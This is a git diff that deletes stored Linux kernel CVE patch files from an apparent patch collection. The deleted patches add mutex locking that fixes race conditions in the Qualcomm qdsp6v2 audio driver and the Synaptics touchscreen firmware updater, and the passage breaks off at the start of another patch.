---- a/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c
-+++ b/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c
-@@ -1,6 +1,6 @@
- /* Copyright (C) 2008 Google, Inc.
-  * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2009-2013, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2009-2013,2016 The Linux Foundation. All rights reserved.
-  *
-  * This software is licensed under the terms of the GNU General Public
-  * License version 2, as published by the Free Software Foundation, and
-@@ -562,6 +562,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- 	struct q6audio_aio *audio = file->private_data;
- 	pr_debug("%s[%p]\n", __func__, audio);
- 	mutex_lock(&audio->lock);
-+	mutex_lock(&audio->read_lock);
-+	mutex_lock(&audio->write_lock);
- 	audio->wflush = 1;
- 	if (audio->enabled)
- 		audio_aio_flush(audio);
-@@ -577,6 +579,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- 	audio_aio_reset_event_queue(audio);
- 	q6asm_audio_client_free(audio->ac);
- 	mutex_unlock(&audio->lock);
-+	mutex_unlock(&audio->write_lock);
-+	mutex_unlock(&audio->read_lock);
- 	mutex_destroy(&audio->lock);
- 	mutex_destroy(&audio->read_lock);
- 	mutex_destroy(&audio->write_lock);
-@@ -1349,8 +1353,13 @@ long audio_aio_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- 		mutex_lock(&audio->lock);
- 		if (copy_from_user(&info, (void *)arg, sizeof(info)))
- 			rc = -EFAULT;
--		else
-+		else{
-+			mutex_lock(&audio->read_lock);
-+			mutex_lock(&audio->write_lock);
- 			rc = audio_aio_ion_add(audio, &info);
-+			mutex_unlock(&audio->write_lock);
-+			mutex_unlock(&audio->read_lock);
-+		}
- 		mutex_unlock(&audio->lock);
- 		break;
- 	}
-@@ -1360,8 +1369,13 @@ long audio_aio_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- 		pr_debug("%s[%p]:AUDIO_DEREGISTER_ION\n", __func__, audio);
- 		if (copy_from_user(&info, (void *)arg, sizeof(info)))
- 			rc = -EFAULT;
--		else
-+		else{
-+                        mutex_lock(&audio->read_lock);
-+                        mutex_lock(&audio->write_lock);
- 			rc = audio_aio_ion_remove(audio, &info);
-+                        mutex_unlock(&audio->write_lock);
-+                        mutex_unlock(&audio->read_lock);
-+		}
- 		mutex_unlock(&audio->lock);
- 		break;
- 	}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8391/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-8391/ANY/0002.patch
deleted file mode 100644
index 01fe5416..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8391/ANY/0002.patch
+++ /dev/null
@@ -1,97 +0,0 @@
-From 62580295210b6c0bd809cde7088b45ebb65ace79 Mon Sep 17 00:00:00 2001
-From: Walter Yang <yandongy@codeaurora.org>
-Date: Wed, 28 Sep 2016 20:11:23 +0800
-Subject: ASoC: msm: lock read/write when add/free audio ion memory
-
-As read/write get access to ion memory region as well, it's
-necessary to lock them when ion memory is about to be added/freed
-to avoid racing cases.
-
-CRs-Fixed: 1071809
-Change-Id: I436ead23c93384961b38ca99b9312a40c50ad03a
-Signed-off-by: Walter Yang <yandongy@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/audio_utils_aio.c | 22 +++++++++++++++++++++-
- 1 file changed, 21 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-index 8041111..7a4bae3 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-@@ -1,6 +1,6 @@
- /* Copyright (C) 2008 Google, Inc.
-  * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2009-2014, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2009-2016, The Linux Foundation. All rights reserved.
-  *
-  * This software is licensed under the terms of the GNU General Public
-  * License version 2, as published by the Free Software Foundation, and
-@@ -570,6 +570,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- 	struct q6audio_aio *audio = file->private_data;
- 	pr_debug("%s[%p]\n", __func__, audio);
- 	mutex_lock(&audio->lock);
-+	mutex_lock(&audio->read_lock);
-+	mutex_lock(&audio->write_lock);
- 	audio->wflush = 1;
- 	if (audio->enabled)
- 		audio_aio_flush(audio);
-@@ -584,6 +586,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- 	wake_up(&audio->event_wait);
- 	audio_aio_reset_event_queue(audio);
- 	q6asm_audio_client_free(audio->ac);
-+	mutex_unlock(&audio->write_lock);
-+	mutex_unlock(&audio->read_lock);
- 	mutex_unlock(&audio->lock);
- 	mutex_destroy(&audio->lock);
- 	mutex_destroy(&audio->read_lock);
-@@ -1679,7 +1683,11 @@ static long audio_aio_ioctl(struct file *file, unsigned int cmd,
- 				__func__);
- 			rc = -EFAULT;
- 		} else {
-+			mutex_lock(&audio->read_lock);
-+			mutex_lock(&audio->write_lock);
- 			rc = audio_aio_ion_add(audio, &info);
-+			mutex_unlock(&audio->write_lock);
-+			mutex_unlock(&audio->read_lock);
- 		}
- 		mutex_unlock(&audio->lock);
- 		break;
-@@ -1694,7 +1702,11 @@ static long audio_aio_ioctl(struct file *file, unsigned int cmd,
- 				__func__);
- 			rc = -EFAULT;
- 		} else {
-+			mutex_lock(&audio->read_lock);
-+			mutex_lock(&audio->write_lock);
- 			rc = audio_aio_ion_remove(audio, &info);
-+			mutex_unlock(&audio->write_lock);
-+			mutex_unlock(&audio->read_lock);
- 		}
- 		mutex_unlock(&audio->lock);
- 		break;
-@@ -1996,7 +2008,11 @@ static long audio_aio_compat_ioctl(struct file *file, unsigned int cmd,
- 		} else {
- 			info.fd = info_32.fd;
- 			info.vaddr = compat_ptr(info_32.vaddr);
-+			mutex_lock(&audio->read_lock);
-+			mutex_lock(&audio->write_lock);
- 			rc = audio_aio_ion_add(audio, &info);
-+			mutex_unlock(&audio->write_lock);
-+			mutex_unlock(&audio->read_lock);
- 		}
- 		mutex_unlock(&audio->lock);
- 		break;
-@@ -2013,7 +2029,11 @@ static long audio_aio_compat_ioctl(struct file *file, unsigned int cmd,
- 		} else {
- 			info.fd = info_32.fd;
- 			info.vaddr = compat_ptr(info_32.vaddr);
-+			mutex_lock(&audio->read_lock);
-+			mutex_lock(&audio->write_lock);
- 			rc = audio_aio_ion_remove(audio, &info);
-+			mutex_unlock(&audio->write_lock);
-+			mutex_unlock(&audio->read_lock);
- 		}
- 		mutex_unlock(&audio->lock);
- 		break;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8392/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8392/ANY/0001.patch
deleted file mode 100644
index 5db9e5c2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8392/ANY/0001.patch
+++ /dev/null
@@ -1,79 +0,0 @@
-From 30a4f0783d2978e27a8b8856d8e358ccaf5ddab4 Mon Sep 17 00:00:00 2001
-From: Walter Yang <yandongy@codeaurora.org>
-Date: Thu, 13 Oct 2016 10:48:39 +0800
-Subject: ASoC: msm: lock read/write when add/free audio ion memory
-
-As read/write get access to ion memory region as well, it's
-necessary to lock them when ion memory is about to be added/freed
-to avoid racing cases.
-
-CRs-Fixed: 1071809
-Change-Id: I436ead23c93384961b38ca99b9312a40c50ad03a
-Signed-off-by: Walter Yang <yandongy@codeaurora.org>
----
- arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c | 20 +++++++++++++++++---
- 1 file changed, 17 insertions(+), 3 deletions(-)
-
-diff --git a/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c b/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c
-index 5bdd10a..4455368 100644
---- a/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c
-+++ b/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c
-@@ -1,6 +1,6 @@
- /* Copyright (C) 2008 Google, Inc.
-  * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2009-2013, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2009-2013,2016 The Linux Foundation. All rights reserved.
-  *
-  * This software is licensed under the terms of the GNU General Public
-  * License version 2, as published by the Free Software Foundation, and
-@@ -562,6 +562,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- 	struct q6audio_aio *audio = file->private_data;
- 	pr_debug("%s[%p]\n", __func__, audio);
- 	mutex_lock(&audio->lock);
-+	mutex_lock(&audio->read_lock);
-+	mutex_lock(&audio->write_lock);
- 	audio->wflush = 1;
- 	if (audio->enabled)
- 		audio_aio_flush(audio);
-@@ -577,6 +579,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- 	audio_aio_reset_event_queue(audio);
- 	q6asm_audio_client_free(audio->ac);
- 	mutex_unlock(&audio->lock);
-+	mutex_unlock(&audio->write_lock);
-+	mutex_unlock(&audio->read_lock);
- 	mutex_destroy(&audio->lock);
- 	mutex_destroy(&audio->read_lock);
- 	mutex_destroy(&audio->write_lock);
-@@ -1349,8 +1353,13 @@ long audio_aio_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- 		mutex_lock(&audio->lock);
- 		if (copy_from_user(&info, (void *)arg, sizeof(info)))
- 			rc = -EFAULT;
--		else
-+		else{
-+			mutex_lock(&audio->read_lock);
-+			mutex_lock(&audio->write_lock);
- 			rc = audio_aio_ion_add(audio, &info);
-+			mutex_unlock(&audio->write_lock);
-+			mutex_unlock(&audio->read_lock);
-+		}
- 		mutex_unlock(&audio->lock);
- 		break;
- 	}
-@@ -1360,8 +1369,13 @@ long audio_aio_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- 		pr_debug("%s[%p]:AUDIO_DEREGISTER_ION\n", __func__, audio);
- 		if (copy_from_user(&info, (void *)arg, sizeof(info)))
- 			rc = -EFAULT;
--		else
-+		else{
-+                        mutex_lock(&audio->read_lock);
-+                        mutex_lock(&audio->write_lock);
- 			rc = audio_aio_ion_remove(audio, &info);
-+                        mutex_unlock(&audio->write_lock);
-+                        mutex_unlock(&audio->read_lock);
-+		}
- 		mutex_unlock(&audio->lock);
- 		break;
- 	}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8392/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-8392/ANY/0002.patch
deleted file mode 100644
index 01fe5416..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8392/ANY/0002.patch
+++ /dev/null
@@ -1,97 +0,0 @@
-From 62580295210b6c0bd809cde7088b45ebb65ace79 Mon Sep 17 00:00:00 2001
-From: Walter Yang <yandongy@codeaurora.org>
-Date: Wed, 28 Sep 2016 20:11:23 +0800
-Subject: ASoC: msm: lock read/write when add/free audio ion memory
-
-As read/write get access to ion memory region as well, it's
-necessary to lock them when ion memory is about to be added/freed
-to avoid racing cases.
-
-CRs-Fixed: 1071809
-Change-Id: I436ead23c93384961b38ca99b9312a40c50ad03a
-Signed-off-by: Walter Yang <yandongy@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/audio_utils_aio.c | 22 +++++++++++++++++++++-
- 1 file changed, 21 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-index 8041111..7a4bae3 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-@@ -1,6 +1,6 @@
- /* Copyright (C) 2008 Google, Inc.
-  * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2009-2014, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2009-2016, The Linux Foundation. All rights reserved.
-  *
-  * This software is licensed under the terms of the GNU General Public
-  * License version 2, as published by the Free Software Foundation, and
-@@ -570,6 +570,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- 	struct q6audio_aio *audio = file->private_data;
- 	pr_debug("%s[%p]\n", __func__, audio);
- 	mutex_lock(&audio->lock);
-+	mutex_lock(&audio->read_lock);
-+	mutex_lock(&audio->write_lock);
- 	audio->wflush = 1;
- 	if (audio->enabled)
- 		audio_aio_flush(audio);
-@@ -584,6 +586,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- 	wake_up(&audio->event_wait);
- 	audio_aio_reset_event_queue(audio);
- 	q6asm_audio_client_free(audio->ac);
-+	mutex_unlock(&audio->write_lock);
-+	mutex_unlock(&audio->read_lock);
- 	mutex_unlock(&audio->lock);
- 	mutex_destroy(&audio->lock);
- 	mutex_destroy(&audio->read_lock);
-@@ -1679,7 +1683,11 @@ static long audio_aio_ioctl(struct file *file, unsigned int cmd,
- 				__func__);
- 			rc = -EFAULT;
- 		} else {
-+			mutex_lock(&audio->read_lock);
-+			mutex_lock(&audio->write_lock);
- 			rc = audio_aio_ion_add(audio, &info);
-+			mutex_unlock(&audio->write_lock);
-+			mutex_unlock(&audio->read_lock);
- 		}
- 		mutex_unlock(&audio->lock);
- 		break;
-@@ -1694,7 +1702,11 @@ static long audio_aio_ioctl(struct file *file, unsigned int cmd,
- 				__func__);
- 			rc = -EFAULT;
- 		} else {
-+			mutex_lock(&audio->read_lock);
-+			mutex_lock(&audio->write_lock);
- 			rc = audio_aio_ion_remove(audio, &info);
-+			mutex_unlock(&audio->write_lock);
-+			mutex_unlock(&audio->read_lock);
- 		}
- 		mutex_unlock(&audio->lock);
- 		break;
-@@ -1996,7 +2008,11 @@ static long audio_aio_compat_ioctl(struct file *file, unsigned int cmd,
- 		} else {
- 			info.fd = info_32.fd;
- 			info.vaddr = compat_ptr(info_32.vaddr);
-+			mutex_lock(&audio->read_lock);
-+			mutex_lock(&audio->write_lock);
- 			rc = audio_aio_ion_add(audio, &info);
-+			mutex_unlock(&audio->write_lock);
-+			mutex_unlock(&audio->read_lock);
- 		}
- 		mutex_unlock(&audio->lock);
- 		break;
-@@ -2013,7 +2029,11 @@ static long audio_aio_compat_ioctl(struct file *file, unsigned int cmd,
- 		} else {
- 			info.fd = info_32.fd;
- 			info.vaddr = compat_ptr(info_32.vaddr);
-+			mutex_lock(&audio->read_lock);
-+			mutex_lock(&audio->write_lock);
- 			rc = audio_aio_ion_remove(audio, &info);
-+			mutex_unlock(&audio->write_lock);
-+			mutex_unlock(&audio->read_lock);
- 		}
- 		mutex_unlock(&audio->lock);
- 		break;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8393/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8393/ANY/0001.patch
deleted file mode 100644
index e2c7abee..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8393/ANY/0001.patch
+++ /dev/null
@@ -1,444 +0,0 @@
-From 9397e20764da2fdffdfe20e35cb78211753b83cc Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Wed, 14 Sep 2016 17:21:48 -0700
-Subject: [PATCH] input: synaptics: prevent sysfs races
-
-concurrent sysfs calls on the fw updater can cause
-ugly race conditions.  Return EBUSY on concurrent sysfs calls.
-
-For sysfs calls which generate deferred work, prevent
-the deferred work from running concurrently with other
-sysfs calls.
-
-Change-Id: Ie33add946fbcca8309998e4cb7cb01525c667c7e
-Signed-off-by: Andrew Chant <achant@google.com>
-Bug: 31252388
----
- drivers/input/touchscreen/synaptics_fw_update.c | 144 ++++++++++++++++++------
- 1 file changed, 109 insertions(+), 35 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_fw_update.c b/drivers/input/touchscreen/synaptics_fw_update.c
-index 79b3a780550b8..ffa992b829a5a 100644
---- a/drivers/input/touchscreen/synaptics_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_fw_update.c
-@@ -22,6 +22,7 @@
- #include <linux/slab.h>
- #include <linux/i2c.h>
- #include <linux/interrupt.h>
-+#include <linux/mutex.h>
- #include <linux/delay.h>
- #include <linux/input.h>
- #include <linux/firmware.h>
-@@ -296,6 +297,7 @@ struct synaptics_rmi4_fwu_handle {
- static struct synaptics_rmi4_fwu_handle *fwu;
- 
- DECLARE_COMPLETION(fwu_remove_complete);
-+DEFINE_MUTEX(fwu_sysfs_mutex);
- 
- static unsigned int extract_uint(const unsigned char *ptr)
- {
-@@ -1713,34 +1715,47 @@ static ssize_t fwu_sysfs_show_image(struct file *data_file,
- 		char *buf, loff_t pos, size_t count)
- {
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
-+	ssize_t retval;
-+
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
- 
- 	if (count < fwu->config_size) {
- 		dev_err(&rmi4_data->i2c_client->dev,
- 				"%s: Not enough space (%zu bytes) in buffer\n",
- 				__func__, count);
--		return -EINVAL;
-+		retval = -EINVAL;
-+		goto show_image_exit;
- 	}
- 
- 	memcpy(buf, fwu->read_config_buf, fwu->config_size);
--
--	return fwu->config_size;
-+	retval = fwu->config_size;
-+show_image_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
-+	return retval;
- }
- 
- static ssize_t fwu_sysfs_store_image(struct file *data_file,
- 		struct kobject *kobj, struct bin_attribute *attributes,
- 		char *buf, loff_t pos, size_t count)
- {
-+	ssize_t retval;
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	if (!fwu->ext_data_source) {
- 		dev_err(&fwu->rmi4_data->i2c_client->dev,
- 			"Cannot use this without setting imagesize!\n");
--		return -EAGAIN;
-+		retval = -EAGAIN;
-+		goto store_image_exit;
- 	}
- 
- 	if (count > fwu->image_size - fwu->data_pos) {
- 		dev_err(&fwu->rmi4_data->i2c_client->dev,
- 				"%s: Not enough space in buffer\n",
- 				__func__);
--		return -EINVAL;
-+		retval = -EINVAL;
-+		goto store_image_exit;
- 	}
- 
- 	memcpy((void *)(&fwu->ext_data_source[fwu->data_pos]),
-@@ -1749,8 +1764,11 @@ static ssize_t fwu_sysfs_store_image(struct file *data_file,
- 
- 	fwu->data_buffer = fwu->ext_data_source;
- 	fwu->data_pos += count;
-+	retval = count;
- 
--	return count;
-+store_image_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
-+	return retval;
- }
- 
- static ssize_t fwu_sysfs_image_name_store(struct device *dev,
-@@ -1758,11 +1776,15 @@ static ssize_t fwu_sysfs_image_name_store(struct device *dev,
- {
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 	char *strptr;
-+	ssize_t retval;
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
- 
- 	if (count >= NAME_BUFFER_SIZE) {
- 		dev_err(&rmi4_data->i2c_client->dev,
- 			"Input over %d characters long\n", NAME_BUFFER_SIZE);
--		return -EINVAL;
-+		retval = -EINVAL;
-+		goto image_name_store_exit;
- 	}
- 
- 	strptr = strnstr(buf, ".img",
-@@ -1770,21 +1792,32 @@ static ssize_t fwu_sysfs_image_name_store(struct device *dev,
- 	if (!strptr) {
- 		dev_err(&rmi4_data->i2c_client->dev,
- 			"Input is not valid .img file\n");
--		return -EINVAL;
-+		retval = -EINVAL;
-+		goto image_name_store_exit;
- 	}
- 
- 	strlcpy(rmi4_data->fw_image_name, buf, count);
--	return count;
-+	retval = count;
-+
-+image_name_store_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
-+	return retval;
- }
- 
- static ssize_t fwu_sysfs_image_name_show(struct device *dev,
- 		struct device_attribute *attr, char *buf)
- {
-+	ssize_t retval;
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
- 	if (strnlen(fwu->rmi4_data->fw_image_name, NAME_BUFFER_SIZE) > 0)
--		return snprintf(buf, PAGE_SIZE, "%s\n",
-+		retval = snprintf(buf, PAGE_SIZE, "%s\n",
- 			fwu->rmi4_data->fw_image_name);
- 	else
--		return snprintf(buf, PAGE_SIZE, "No firmware name given\n");
-+		retval = snprintf(buf, PAGE_SIZE, "No firmware name given\n");
-+
-+	mutex_unlock(&fwu_sysfs_mutex);
-+	return retval;
- }
- 
- static ssize_t fwu_sysfs_force_reflash_store(struct device *dev,
-@@ -1794,14 +1827,17 @@ static ssize_t fwu_sysfs_force_reflash_store(struct device *dev,
- 	unsigned int input;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	if (sscanf(buf, "%u", &input) != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto force_reflash_store_exit;
- 	}
- 
- 	if (input != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto force_reflash_store_exit;
- 	}
- 	if (LOCKDOWN)
- 		fwu->do_lockdown = true;
-@@ -1812,16 +1848,18 @@ static ssize_t fwu_sysfs_force_reflash_store(struct device *dev,
- 		dev_err(&rmi4_data->i2c_client->dev,
- 				"%s: Failed to do reflash\n",
- 				__func__);
--		goto exit;
-+		goto force_reflash_store_free_exit;
- 	}
- 
- 	retval = count;
- 
--exit:
-+force_reflash_store_free_exit:
- 	kfree(fwu->ext_data_source);
- 	fwu->ext_data_source = NULL;
- 	fwu->force_update = FORCE_UPDATE;
- 	fwu->do_lockdown = rmi4_data->board->do_lockdown;
-+force_reflash_store_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
- 	return retval;
- }
- 
-@@ -1832,9 +1870,12 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev,
- 	unsigned int input;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	if (sscanf(buf, "%u", &input) != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto reflash_store_exit;
- 	}
- 
- 	if (input & LOCKDOWN) {
-@@ -1844,7 +1885,7 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev,
- 
- 	if ((input != NORMAL) && (input != FORCE)) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto reflash_store_exit;
- 	}
- 
- 	if (input == FORCE)
-@@ -1855,16 +1896,18 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev,
- 		dev_err(&rmi4_data->i2c_client->dev,
- 				"%s: Failed to do reflash\n",
- 				__func__);
--		goto exit;
-+		goto reflash_store_free_exit;
- 	}
- 
- 	retval = count;
- 
--exit:
-+reflash_store_free_exit:
- 	kfree(fwu->ext_data_source);
- 	fwu->ext_data_source = NULL;
- 	fwu->force_update = FORCE_UPDATE;
- 	fwu->do_lockdown = rmi4_data->board->do_lockdown;
-+reflash_store_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
- 	return retval;
- }
- 
-@@ -1875,26 +1918,31 @@ static ssize_t fwu_sysfs_write_lockdown_store(struct device *dev,
- 	unsigned int input;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	if (sscanf(buf, "%u", &input) != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto lockdown_store_exit;
- 	}
- 
- 	if (input != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto lockdown_store_exit;
- 	}
- 
- 	if (!fwu->ext_data_source) {
- 		dev_err(&fwu->rmi4_data->i2c_client->dev,
- 			"Cannot use this without loading image in manual way!\n");
--		return -EAGAIN;
-+		retval = -EAGAIN;
-+		goto lockdown_store_exit;
- 	}
- 
- 	if (fwu->rmi4_data->suspended == true) {
- 		dev_err(&fwu->rmi4_data->i2c_client->dev,
- 			"Cannot lockdown while device is in suspend\n");
--		return -EBUSY;
-+		retval = -EBUSY;
-+		goto lockdown_store_exit;
- 	}
- 
- 	retval = fwu_start_write_lockdown();
-@@ -1902,16 +1950,18 @@ static ssize_t fwu_sysfs_write_lockdown_store(struct device *dev,
- 		dev_err(&rmi4_data->i2c_client->dev,
- 				"%s: Failed to write lockdown block\n",
- 				__func__);
--		goto exit;
-+		goto lockdown_store_free_exit;
- 	}
- 
- 	retval = count;
- 
--exit:
-+lockdown_store_free_exit:
- 	kfree(fwu->ext_data_source);
- 	fwu->ext_data_source = NULL;
- 	fwu->force_update = FORCE_UPDATE;
- 	fwu->do_lockdown = rmi4_data->board->do_lockdown;
-+lockdown_store_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
- 	return retval;
- }
- 
-@@ -1920,6 +1970,8 @@ static ssize_t fwu_sysfs_check_fw_store(struct device *dev,
- {
- 	unsigned int input = 0;
- 
-+	/* Takes fwu_sysfs_mutex in the deferred work function. */
-+
- 	if (sscanf(buf, "%u", &input) != 1)
- 		return -EINVAL;
- 
-@@ -1942,26 +1994,31 @@ static ssize_t fwu_sysfs_write_config_store(struct device *dev,
- 	unsigned int input;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	if (sscanf(buf, "%u", &input) != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto write_config_store_exit;
- 	}
- 
- 	if (input != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto write_config_store_exit;
- 	}
- 
- 	if (!fwu->ext_data_source) {
- 		dev_err(&fwu->rmi4_data->i2c_client->dev,
- 			"Cannot use this without loading image in manual way!\n");
--		return -EAGAIN;
-+		retval = -EAGAIN;
-+		goto write_config_store_exit;
- 	}
- 
- 	if (fwu->rmi4_data->suspended == true) {
- 		dev_err(&fwu->rmi4_data->i2c_client->dev,
- 			"Cannot write config while device is in suspend\n");
--		return -EBUSY;
-+		retval = -EBUSY;
-+		goto write_config_store_exit;
- 	}
- 
- 	retval = fwu_start_write_config();
-@@ -1969,14 +2026,16 @@ static ssize_t fwu_sysfs_write_config_store(struct device *dev,
- 		dev_err(&rmi4_data->i2c_client->dev,
- 				"%s: Failed to write config\n",
- 				__func__);
--		goto exit;
-+		goto write_config_store_free_exit;
- 	}
- 
- 	retval = count;
- 
--exit:
-+write_config_store_free_exit:
- 	kfree(fwu->ext_data_source);
- 	fwu->ext_data_source = NULL;
-+write_config_store_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
- 	return retval;
- }
- 
-@@ -1999,7 +2058,11 @@ static ssize_t fwu_sysfs_read_config_store(struct device *dev,
- 		return -EBUSY;
- 	}
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
- 	retval = fwu_do_read_config();
-+	mutex_unlock(&fwu_sysfs_mutex);
-+
- 	if (retval < 0) {
- 		dev_err(&rmi4_data->i2c_client->dev,
- 				"%s: Failed to read config\n",
-@@ -2028,7 +2091,10 @@ static ssize_t fwu_sysfs_config_area_store(struct device *dev,
- 		return -EINVAL;
- 	}
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
- 	fwu->config_area = config_area;
-+	mutex_unlock(&fwu_sysfs_mutex);
- 
- 	return count;
- }
-@@ -2039,10 +2105,12 @@ static ssize_t fwu_sysfs_image_size_store(struct device *dev,
- 	int retval;
- 	unsigned long size;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
- 
- 	retval = kstrtoul(buf, 10, &size);
- 	if (retval)
--		return retval;
-+		goto image_size_store_exit;
- 
- 	fwu->image_size = size;
- 	fwu->data_pos = 0;
-@@ -2053,10 +2121,12 @@ static ssize_t fwu_sysfs_image_size_store(struct device *dev,
- 		dev_err(&rmi4_data->i2c_client->dev,
- 				"%s: Failed to alloc mem for image data\n",
- 				__func__);
--		return -ENOMEM;
-+		retval = -ENOMEM;
- 	}
- 
--	return count;
-+image_size_store_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
-+	return retval;
- }
- 
- static ssize_t fwu_sysfs_block_size_show(struct device *dev,
-@@ -2241,6 +2311,8 @@ static void synaptics_rmi4_fwu_work(struct work_struct *work)
- 		container_of(to_delayed_work(work),
- 			struct synaptics_rmi4_fwu_handle, fwu_work);
- 
-+	mutex_lock(&fwu_sysfs_mutex);
-+
- 	if (fwu->fn_ptr->enable)
- 		fwu->fn_ptr->enable(fwu->rmi4_data, false);
- 
-@@ -2248,6 +2320,8 @@ static void synaptics_rmi4_fwu_work(struct work_struct *work)
- 
- 	if (fwu->fn_ptr->enable)
- 		fwu->fn_ptr->enable(fwu->rmi4_data, true);
-+
-+	mutex_unlock(&fwu_sysfs_mutex);
- }
- 
- static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
-@@ -2338,7 +2412,7 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 	INIT_DELAYED_WORK(&fwu->fwu_work, synaptics_rmi4_fwu_work);
- #endif
- 
--        retval = sysfs_create_bin_file(&rmi4_data->i2c_client->dev.kobj,
-+	retval = sysfs_create_bin_file(&rmi4_data->i2c_client->dev.kobj,
- 			&dev_attr_data);
- 	if (retval < 0) {
- 		dev_err(&rmi4_data->i2c_client->dev,
diff --git a/Patches/Linux_CVEs/CVE-2016-8393/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-8393/ANY/0002.patch
deleted file mode 100644
index 1c473612..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8393/ANY/0002.patch
+++ /dev/null
@@ -1,61 +0,0 @@
-From fd11eb5c433743c87bebe699604adfd7e7e805cf Mon Sep 17 00:00:00 2001
-From: Min Chong <mchong@google.com>
-Date: Thu, 13 Oct 2016 09:47:01 -0700
